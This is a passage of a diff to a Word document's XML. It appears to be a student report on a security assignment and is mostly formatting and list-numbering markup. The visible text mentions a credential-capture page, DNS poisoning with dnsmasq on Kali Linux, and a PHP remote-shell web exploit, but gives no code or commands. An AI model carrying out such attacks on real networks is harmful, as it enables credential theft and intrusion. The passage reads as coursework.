+              <w:t xml:space="preserve"> and record the screen record of task 1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t xml:space="preserve"> and </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t>record the screen record of task 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JIANG :install </w:t>
+              <w:t xml:space="preserve">install </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t>the</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t xml:space="preserve"> kali linux on the raspberry </w:t>
             </w:r>
@@ -2561,7 +7102,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1832"/>
+          <w:trHeight w:val="854"/>
           <w:jc w:val="center"/>
         </w:trPr>
         <w:tc>
@@ -2593,24 +7134,32 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t xml:space="preserve">LIU : </w:t>
+              <w:t xml:space="preserve">We </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="32"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t>build the backend and frontend to capture the password</w:t>
             </w:r>
@@ -2618,20 +7167,26 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-          <w:p>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="32"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t xml:space="preserve">JIANG: configure the dnsmasq in kali </w:t>
+              <w:t xml:space="preserve">And </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">configure the dnsmasq in kali </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2647,6 +7202,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="1295"/>
           <w:jc w:val="center"/>
         </w:trPr>
         <w:tc>
@@ -2683,11 +7239,20 @@
                 <w:szCs w:val="32"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>To do the DNS poisoning task, we search for some solutions on Internet in first two days, then we get some idea about the principles of DNS poisoning, and choose dnsmasq tools to perform the attack. Then we implemented the task in the first week, including code writing (in JavaScript and Python) and modifying configuration files.</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="2752"/>
           <w:jc w:val="center"/>
         </w:trPr>
         <w:tc>
@@ -2718,10 +7283,34 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:pStyle w:val="Default"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:color w:val="auto"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-AU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:color w:val="auto"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-AU"/>
+              </w:rPr>
+              <w:t>In the last week, we used 4 days to complete web exploit and remote shell code execution, which includes 1 day brainstorming and 3 days implementation (PHP shell execution functions, code-execution privileges). Then, we use 3 days to complete this report and prepare the screen recordings for submission.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
                 <w:sz w:val="32"/>
                 <w:szCs w:val="32"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -2754,8 +7343,6 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2849,6 +7436,208 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0BAB4CF0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B8F05030"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="780" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1200" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1620" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2040" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2460" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3300" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3720" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4140" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1230623A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="81D44AA2"/>
+    <w:lvl w:ilvl="0" w:tplc="AEF46BBC">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C4F465C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8B50EB78"/>
@@ -2937,7 +7726,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="200226C6"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="D330617C"/>
+    <w:lvl w:ilvl="0" w:tplc="F0348ECC">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="22B1178F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82D25552"/>
@@ -3028,14 +7906,347 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="28051214"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6CAA45D6"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="780" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1200" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1620" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2040" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2460" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3300" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3720" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4140" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2E4E2692"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="80AA62B8"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="789B2E63"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="69A41840"/>
+    <w:lvl w:ilvl="0" w:tplc="AF4C8D84">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
